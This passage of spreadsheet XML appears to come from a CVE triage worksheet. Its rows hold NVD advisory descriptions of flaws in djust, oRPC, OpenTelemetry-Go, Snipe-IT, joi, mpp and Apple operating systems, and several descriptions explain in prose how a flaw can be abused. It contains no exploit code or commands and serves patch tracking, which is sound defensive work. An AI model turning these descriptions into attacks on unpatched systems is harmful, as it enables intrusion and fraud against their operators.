      <c r="S983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56719</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61589</t>
        </is>
      </c>
      <c r="D984" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E984" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F984" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="inlineStr"/>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr"/>
      <c r="L984" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M984" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr"/>
      <c r="Q984" s="5" t="inlineStr">
        <is>
          <t>CWE-348, CWE-639</t>
        </is>
      </c>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the WebSocket `handle_mount` and `ViewRuntime._build_request` rebuild an `HttpRequest` via `RequestFactory().get(...)` with no `HTTP_HOST`, so `request.get_host()` defaulted to `"testserver"` on the live path. Host/subdomain/domain `TenantResolver`s then misresolved the tenant — `None` on the live path while the HTTP path resolved correctly. With `STRICT_MODE=False` the tenant-scoped managers returned unscoped rows (cross-tenant disclosure); with the default they returned an empty queryset (broken tenancy). This is fixed in djust 1.0.7. The handshake Host is extracted from the ASGI scope, validated against `ALLOWED_HOSTS` (the same logic as the CSWSH Origin gate, parsed with Django's `split_domain_port` so malformed Hosts are rejected at the boundary), and propagated — with the TLS scheme — into the reconstructed request, so live-path tenant resolution matches HTTP exactly. There is no known workaround on the live path short of upgrading. Users are most exposed when combined with `STRICT_MODE=False`.</t>
        </is>
      </c>
      <c r="S984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61589</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64717</t>
        </is>
      </c>
      <c r="D985" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E985" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F985" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr"/>
      <c r="Q985" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 18.7.10 and iPadOS 18.7.10, iOS 26.6 and iPadOS 26.6, macOS Sequoia 15.7.8, macOS Tahoe 26.6, tvOS 26.6, visionOS 26.6, watchOS 26.6. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64717</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73169</t>
        </is>
      </c>
      <c r="D986" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E986" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F986" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="inlineStr"/>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr"/>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr"/>
      <c r="Q986" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in the Modbus transaction management interface of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote authenticated attacker to store malicious script content that executes in the browser of any administrator who later opens an affected management page.</t>
        </is>
      </c>
      <c r="S986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73169</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77360</t>
        </is>
      </c>
      <c r="D987" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E987" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F987" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="inlineStr"/>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr"/>
      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr"/>
      <c r="Q987" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>oRPC is an tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to 1.14.8, the @orpc/server CORS plugin in packages/server/src/plugins/cors.ts copies a client's incoming Vary request header into the response instead of controlling Vary as a response-only header and using Origin for request-origin variation. In deployments behind a shared cache, CDN, or reverse proxy that keys responses using Vary, a client can inject arbitrary variation values, pollute cache keys, and cause inconsistent CORS enforcement for other clients. Default non-cached configurations have no established direct confidentiality, integrity, or availability impact. This issue is fixed in version 1.14.8.</t>
        </is>
      </c>
      <c r="S987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77360</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D988" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E988" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F988" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="inlineStr"/>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr"/>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr"/>
      <c r="Q988" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-923</t>
        </is>
      </c>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.21.0, the exporters/otlp/otlplog/otlploggrpc package loads OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE, OTEL_EXPORTER_OTLP_CERTIFICATE, and related client certificate environment variables through loadEnvTLS into cfg.tlsCfg, but newGRPCDialOptions does not apply cfg.tlsCfg when creating gRPC transport credentials. The environment-only TLS path instead uses credentials.NewTLS with system roots and no configured client certificate, bypassing intended private CA pinning and mutual TLS unless the application also supplies WithTLSCredentials. A network attacker able to intercept or spoof the collector connection with a system-trusted certificate can read or alter log telemetry. This issue is fixed in version 0.21.0.</t>
        </is>
      </c>
      <c r="S988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81872</t>
        </is>
      </c>
      <c r="D989" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E989" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F989" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="inlineStr"/>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr"/>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr"/>
      <c r="Q989" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. Prior to version 0.21.0, the go.opentelemetry.io/otel/sdk/log BatchingProcessor can enter a tight CPU loop when attacker-driven log emission fills its asynchronous export buffer while the exporter is backpressured. NewBatchingProcessor wraps the exporter with newBufferExporter(exporter, 1), and the poll loop calls queue.TryDequeue and bufferExporter.EnqueueExport before immediately signaling pollTrigger whenever the queue remains at or above batchSize. Because a failed nonblocking EnqueueExport leaves the queue length unchanged, the processor repeatedly retries without waiting for its ticker, exhausting CPU and degrading or denying service in the embedding process. This issue is fixed in version 0.21.0.</t>
        </is>
      </c>
      <c r="S989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81872</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86774</t>
        </is>
      </c>
      <c r="D990" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E990" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr"/>
      <c r="Q990" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a broken access control vulnerability in AssetModelPolicy where the files() method cascades from assets.files permission, allowing authenticated users to upload and delete file attachments on Asset Model records without the required models.files permission. Attackers with only assets.files permission can mutate shared model file attachments across company boundaries and bypass the dedicated models.files permission intended to restrict file management on the shared Asset Model catalog.</t>
        </is>
      </c>
      <c r="S990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86774</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87047</t>
        </is>
      </c>
      <c r="D991" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E991" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F991" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr"/>
      <c r="Q991" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87047</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87113</t>
        </is>
      </c>
      <c r="D992" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E992" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F992" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="inlineStr"/>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr"/>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr"/>
      <c r="Q992" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R992" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Threat Response.</t>
        </is>
      </c>
      <c r="S992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87113</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88255</t>
        </is>
      </c>
      <c r="D993" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E993" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F993" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr"/>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr"/>
      <c r="Q993" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Unsafe Equivalence in Input in ZenHive mpp allows an unauthenticated remote client to pass the Tempo duplicate-submission gate twice with one signed transaction.
MPP.Methods.Tempo reserves the pre-broadcast dedup slot on the caller-supplied hex in reserve_hash_atomic/2, keyed through store_key/1 on tx.raw rather than on a canonical form of the transaction. The deserializer stores the caller's hex verbatim and accepts both recovery-id encodings, so one signed transaction submitted once with v=27 and once with v=0 yields two distinct reserve keys, and both pass the reserve and reach the broadcast path. The plug-level credential replay store is deliberately carved out for tempo in lib/mpp/replay.ex, leaving this reserve as the only gate, and the post-broadcast mark writes the canonical hash key that the raw-keyed reserve never reads.
What the duplicate submission yields depends on the node: a nonce-reuse rejection fails closed, while a node that answers with the canonical hash for an already-known transaction returns a second valid Payment-Receipt for a single on-chain payment.
This issue affects mpp: from 0.2.0 before 0.16.2.</t>
        </is>
      </c>
      <c r="S993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88255</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88819</t>
        </is>
      </c>
      <c r="D994" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E994" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F994" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr"/>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr"/>
      <c r="Q994" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="R994" s="5" t="inlineStr">
        <is>
          <t>In Siglet current and past versions the refresh token handler do not enforce proof of possession of the issuer DID.</t>
        </is>
      </c>
      <c r="S994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88819</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89186</t>
        </is>
      </c>
      <c r="D995" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E995" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F995" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr"/>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr"/>
      <c r="Q995" s="5" t="inlineStr">
        <is>
          <t>CWE-524</t>
        </is>
      </c>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>Use of Cache Containing Sensitive Information in ZenHive mpp allows a shared HTTP cache to store a paid response and serve it to clients that never paid.
MPP.Plug.verify_credential in lib/mpp/plug.ex sets payment-receipt and cache-control: private on the connection before the wrapped application runs, and registers no register_before_send/2 callback. Plug.Conn.put_resp_header/3 replaces an existing header, so a mounting application that sets its own cache-control on the paid resource (for example public, max-age=3600) silently overrides the private the library relies on, and a CDN or reverse proxy can then store the paid 200 together with its Payment-Receipt and serve both to unpaid clients. The library-level guarantee is therefore defeatable by the application it protects. For the same reason a downstream non-2xx response still carried Payment-Receipt, issuing a receipt for a response that delivered no resource.
This issue affects mpp: from 0.1.0 before 0.16.2.</t>
        </is>
      </c>
      <c r="S995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89186</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90771</t>
        </is>
      </c>
      <c r="D996" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E996" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F996" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr"/>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr"/>
      <c r="Q996" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>joi before versions 17.13.8 and 18.2.9 contains a prototype pollution vulnerability in the messages compilation function that accepts __proto__ as an error code. Attackers can supply __proto__ keys in custom messages to replace the returned object's prototype, breaking downstream code relying on Object.prototype methods.</t>
        </is>
      </c>
      <c r="S996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90771</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92184</t>
        </is>
      </c>
      <c r="D997" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E997" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr"/>
      <c r="Q997" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R997" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in ag-ui-protocol ag-ui 0.3.0. Affected is the function urllib.request.urlopen of the file integrations/aws-strands/python/src/ag_ui_strands/utils.py of the component Multimodal Content. The manipulation of the argument Value results in server-side request forgery. The attack can be executed remotely. The patch is identified as bf0c34df34cbb4b1992bc37c9bfffe6dd54bb189. It is advisable to implement a patch to correct this issue.</t>
        </is>
      </c>
      <c r="S997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92184</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92217</t>
        </is>
      </c>
      <c r="D998" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E998" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr"/>
      <c r="Q998" s="5" t="inlineStr">
        <is>
          <t>CWE-913, CWE-915</t>
        </is>
      </c>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in a2ui-project a2ui up to 0.10.6. This affects the function processMessages of the file renderers/web_core/src/v0_9/processing/message-processor.ts of the component Message Parsing. This manipulation causes dynamically-determined object attributes. The attack can be initiated remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92217</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92360</t>
        </is>
      </c>
      <c r="D999" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E999" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
